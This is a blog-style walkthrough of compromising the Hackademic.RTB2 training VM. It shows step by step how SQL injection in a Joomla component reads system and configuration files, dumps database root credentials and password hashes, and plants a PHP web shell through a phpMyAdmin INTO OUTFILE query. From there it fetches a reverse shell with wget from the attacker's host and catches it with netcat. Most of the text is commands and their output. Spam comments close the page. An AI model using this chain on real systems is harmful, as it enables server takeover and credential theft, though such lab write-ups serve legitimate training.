Found hash/plain/user = abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy / victim / BTallor

login JSMith / matrix

index.php?option=com_user&view=reset&layout=confirm

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/passwd%27%29
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/apache2.conf%27%29
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned. 
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#
#
LockFile /var/lock/apache2/accept.lock
#

#


#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15

##
## Server-Pool Size Regulation (MPM specific)
##

# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0


# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          2
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxClients          150
    MaxRequestsPerChild   0


# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          2
    MaxClients          150
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxRequestsPerChild   0


# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#

AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#

    Order allow,deny
    Deny from all
    Satisfy all


#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain


#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf

# Include all the user configurations:
Include /etc/apache2/httpd.conf

# Include ports listing
Include /etc/apache2/ports.conf

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined


# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
Include /etc/apache2/conf.d/

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/



Where is the www-root ???

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/sites-available/default%27%29


ServerAdmin webmaster@localhost

    DocumentRoot /var/www/welcome
   
        Options FollowSymLinks
        AllowOverride None
   

    /var/www/
>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
   

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
   
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
   


    ErrorLog /var/log/apache2/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /var/log/apache2/access.log combined

    Alias /doc/ "/usr/share/doc/"
   
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
   




*:666>
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www
   
        Options FollowSymLinks
        AllowOverride None
   

   
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
   


    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
   
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
   


    ErrorLog /var/log/apache2/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /var/log/apache2/access.log combined

    Alias /doc/ "/usr/share/doc/"
   
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
   




http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/welcome/check.php%27%29
  <?php
$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";

if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){
    echo '<h2>';
    echo 'Ok, nice shot...';
    echo '<br>';
    echo '</h2>';
    echo '...but, you are looking in a wrong place bro! ;-)';
    echo '<br>';
    echo '<br>';
    echo '<font color="black">';
    echo '%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A';
    echo '</font color="black">';

}

else{
    echo '<h2>';
    echo 'You are trying to login with wrong credentials!';
    echo '<br>';
    echo '</h2>';
    echo "Please try again...";
}
?>

URL decode :

3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e

Hexa to asci :

<--------->
Knock Knock Knockin' on heaven's door .. :)
00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001
<--------->?

bin to asci:

1 0 0 1 : 1 1 0 1 : 1 0 1 1 : 1 0 0 1

binary to hex:

313030313A3131

binary to decimal

9:13:11:9

decimal to hex

9:D:B:9

I dunno what is this..... ?????

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/index.php%27%29

<?php
/**
* @version        $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package        Joomla
* @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/configuration.php%27%29

<?php
class JConfig {
/* Site Settings */
var $offline = '0';
var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
var $sitename = 'Hackademic.RTB2';
var $editor = 'tinymce';
var $list_limit = '20';
var $legacy = '0';
/* Debug Settings */
var $debug = '0';
var $debug_lang = '0';
/* Database Settings */
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'yUtJklM97W';
var $db = 'joomla';
var $dbprefix = 'jos_';
/* Server Settings */
var $live_site = '';
var $secret = 'iFzlVUCg9BBPoUDU';
var $gzip = '0';
var $error_reporting = '-1';
var $helpurl = 'http://help.joomla.org';
var $xmlrpc_server = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '0';
var $force_ssl = '0';
/* Locale Settings */
var $offset = '0';
var $offset_user = '0';
/* Mail Settings */
var $mailer = 'mail';
var $mailfrom = 'admin@hackademirtb2.com';
var $fromname = 'Hackademic.RTB2';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
/* Cache Settings */
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
/* Meta Settings */
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $MetaTitle = '1';
var $MetaAuthor = '1';
/* SEO Settings */
var $sef           = '0';
var $sef_rewrite   = '0';
var $sef_suffix    = '0';
/* Feed Settings */
var $feed_limit   = 10;
var $feed_email   = 'author';
var $log_path = '/var/www/logs';
var $tmp_path = '/var/www/tmp';
/* Session Setting */
var $lifetime = '15';
var $session_handler = 'database';
}
?>

http://192.168.56.105/phpmyadmin

login: root / yUtJklM97W

http://192.168.56.105/phpmyadmin/index.php?db=joomla&token=1b7a1750b5f6d69cb6797631710e1959

jos_users Administrator Edit

pasword: test: be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX

login Administrator / test
empty page...

http://192.168.56.105/phpmyadmin/sql.php?db=mysql&token=1b7a1750b5f6d69cb6797631710e1959&table=user&pos=0

localhost     root     *5D3C124406BF85494067182754131FF4DAB9C6C7
HackademicRTB2     root     *5D3C124406BF85494067182754131FF4DAB9C6C7    
127.0.0.1     root     *5D3C124406BF85494067182754131FF4DAB9C6C7     Y
localhost     debian-sys-maint     *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996
localhost     phpmyadmin     *5D3C124406BF85494067182754131FF4DAB9C6C7

--------------

phpmyadmin SQL query

http://192.168.56.105/phpmyadmin/tbl_sql.php?db=mysql&table=user&token=6ad2011913439a1e1d387f7182dc1322

SELECT '<? system($_GET["c"]); ?>'
INTO OUTFILE "/var/www/evil.php"


http://192.168.56.105:666/evil.php?c=ls%20-al%20/var/www

total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Nov 14 13:57 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 root     root     76539 Nov  3  2010 CHANGELOG.php
-rw-rw-rw-  1 root     root      1172 Jan 26  2010 COPYRIGHT.php
-rw-rw-rw-  1 root     root     14918 Nov  2  2010 CREDITS.php
-rw-rw-rw-  1 root     root      4344 Jan 26  2010 INSTALL.php
-rw-rw-rw-  1 root     root     17816 Jan 17  2009 LICENSE.php
-rw-rw-rw-  1 root     root     27986 Jan 26  2010 LICENSES.php
-rwxrwxrwx  1 root     root     21697 Jan 17  2011 Untitledt.png
drwxrwxrwx  7 root     root      4096 Nov  3  2010 _installation
drwxrwxrwx  2 root     root      4096 Jan 22  2011 administrator
drwxrwxrwx  2 root     root      4096 Nov  3  2010 cache
drwxrwxrwx 15 root     root      4096 Jan 22  2011 components
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      3411 Jan 26  2010 configuration.php-dist
-rw-rw-rw-  1 mysql    mysql       26 Nov 14 13:57 evil.php
-rw-rw-rw-  1 root     root      2773 Jan 26  2010 htaccess.txt
drwxrwxrwx  6 root     root      4096 Nov  3  2010 images
drwxrwxrwx  8 root     root      4096 Nov  3  2010 includes
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rw-rw-rw-  1 root     root       588 Jan 26  2010 index2.php
-rw-rw-rw-  1 mysql    mysql       20 Nov 14 13:55 info.php
drwxrwxrwx  4 root     root      4096 Nov  3  2010 language
drwxrwxrwx 16 root     root      4096 Nov  3  2010 libraries
drwxrwxrwx  2 root     root      4096 Nov  3  2010 logs
drwxrwxrwx  3 root     root      4096 Nov  3  2010 media
drwxrwxrwx 22 root     root      4096 Nov  3  2010 modules
drwxr-xr-x 11 root     root      4096 Jan 17  2011 pC4Hp8kt@Px8PgkV$!
drwxrwxrwx 11 root     root      4096 Nov  3  2010 plugins
-rw-rw-rw-  1 root     root       304 Aug  8  2006 robots.txt
drwxrwxrwx  7 root     root      4096 Jan 17  2011 templates
drwxrwxrwx  2 root     root      4096 Jan 22  2011 tmp
-rw-rw-rw-  1 mysql    mysql        0 Nov 13 18:25 tmpurwmd.php
-rw-rw-rw-  1 mysql    mysql        0 Nov 13 18:25 tmpuumnf.php
drwxrwxrwx  2 root     root      4096 Nov 14 11:57 welcome
drwxrwxrwx  4 root     root      4096 Nov  3  2010 xmlrpc
-rw-rw-rw-  1 root     root       177 Jan 17  2011 xxx.html

http://192.168.56.105:666/evil.php?c=which%20wget

/usr/bin/wget

192.168.56.105:666/evil.php?c=wget -O phpreverse.php http://192.168.56.101/phpshells/phpreverse.txt

root@kali:~# nc -l -v -p 1234
listening on [any] 1234 ...

http://192.168.56.105:666/phpreverse.php
192.168.56.105: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 59158
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
 14:59:22 up 1 day,  5:10,  0 users,  load average: 0.01, 0.04, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

Next step: Privilege escalation.

4 megjegyzés:

  1. Are you monetizing your premium file uploads?
    Did you know Mgcash will pay you an average of $0.50 per link unlock?

    VálaszTörlés
  2. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you got to watch this video
    right away...

    (VIDEO) Have your ex CRAWLING back to you...?

    VálaszTörlés
  3. Are you making money from your exclusive file uploads?
    Did you know ShareCash will pay you an average of $0.50 per link unlock?

    VálaszTörlés
  4. BlueHost is definitely the best hosting company with plans for all of your hosting needs.

    VálaszTörlés